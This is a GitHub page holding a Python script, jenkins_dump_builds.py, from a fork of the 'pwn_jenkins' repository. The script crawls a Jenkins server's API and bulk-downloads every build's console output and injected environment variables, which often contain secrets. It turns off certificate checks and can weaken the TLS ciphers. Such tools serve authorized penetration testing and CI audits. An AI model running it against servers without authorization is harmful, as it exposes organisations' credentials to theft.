forked from gquere/pwn_jenkins
-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathjenkins_dump_builds.py
executable file
·133 lines (102 loc) · 4.18 KB
/
jenkins_dump_builds.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/env python3
import requests
import json
import urllib3
import os
import argparse
import concurrent.futures
# SUPPRESS WARNINGS ############################################################
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# DOWNGRADE SSL ################################################################
from requests.packages.urllib3.contrib import pyopenssl
def downgrade_ssl():
pyopenssl.DEFAULT_SSL_CIPHER_LIST = 'HIGH:RSA:!DH'
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'HIGH:RSA:!DH'
# CONSTANTS ####################################################################
OUTPUT_DIR = './output/'
RECOVER_LAST_BUILD_ONLY = False
RECOVER_FROM_FAILURE = False
DEBUG = False
BUILD_LIST = []
# UTILS ########################################################################
def print_debug(data):
if DEBUG is True:
print(data)
def create_dir(path):
if not os.path.exists(path):
os.makedirs(path)
# SAVERS #######################################################################
def dump_to_disk(url, consoleText, envVars):
# first, need to create dirs
folder = OUTPUT_DIR + url.replace(BASE_URL, '')
create_dir(folder)
# then dump files
with open(folder + 'consoleText', 'w+') as f:
f.write(consoleText)
with open(folder + 'envVars', 'w+') as f:
f.write(envVars)
def job_was_dumped(url):
folder = OUTPUT_DIR + url.replace(BASE_URL, '')
return os.path.exists(folder)
# DUMPERS ######################################################################
def dump_jobs(url):
r = SESSION.get(url + '/api/json/', verify=False, auth=AUTH, timeout=20)
if 'Authentication required' in r.text:
print('[ERROR] This Jenkins needs authentication')
exit(1)
if 'Invalid password/token' in r.text:
print('[ERROR] Invalid password/token for user')
exit(1)
if 'missing the Overall/Read permission' in r.text:
print('[ERROR] User has no read permission')
exit(1)
response = json.loads(r.text)
print_debug(response)
if 'jobs' in response:
for job in response['jobs']:
if RECOVER_FROM_FAILURE and job_was_dumped(job['url']):
continue
try:
dump_jobs(job['url'])
except requests.exceptions.ReadTimeout:
print('[ERROR] Gave up on job {} because of a timeout (server is probably busy)'.format(job['name']))
if 'builds' in response:
for build in response['builds']:
BUILD_LIST.append(build['url'])
if RECOVER_LAST_BUILD_ONLY == True:
break
def dump_build(url):
r = SESSION.get(url + '/consoleText', verify=False, auth=AUTH, timeout=20)
consoleText = r.text
r = SESSION.get(url + '/injectedEnvVars/api/json', verify=False, auth=AUTH, timeout=20)
envVars = r.text
dump_to_disk(url, consoleText, envVars)
# MAIN #########################################################################
parser = argparse.ArgumentParser(description = 'Dump all available info from Jenkins')
parser.add_argument('url', nargs='+', type=str)
parser.add_argument('-u', '--user', type=str)
parser.add_argument('-p', '--password', type=str)
parser.add_argument('-o', '--output-dir', type=str)
parser.add_argument('-d', '--downgrade_ssl', action='store_true', help='Downgrade SSL to use RSA')
parser.add_argument('-l', '--last', action='store_true', help='Dump only the last build of each job')
parser.add_argument('-r', '--recover_from_failure', action='store_true', help='Recover from server failure, skip all existing directories')
args = parser.parse_args()
if args.user and args.password:
AUTH = (args.user, args.password)
else:
AUTH = None
BASE_URL = args.url[0]
if args.output_dir:
OUTPUT_DIR = args.output_dir + '/'
if args.downgrade_ssl:
downgrade_ssl()
if args.last:
RECOVER_LAST_BUILD_ONLY = True
if args.recover_from_failure:
RECOVER_FROM_FAILURE = True
SESSION = requests.session()
print('[+] Getting a list of jobs and builds')
dump_jobs(BASE_URL)
print('[+] Dumping gathered builds')
with concurrent.futures.ThreadPoolExecutor(max_workers=128) as executor:
executor.map(dump_build, BUILD_LIST)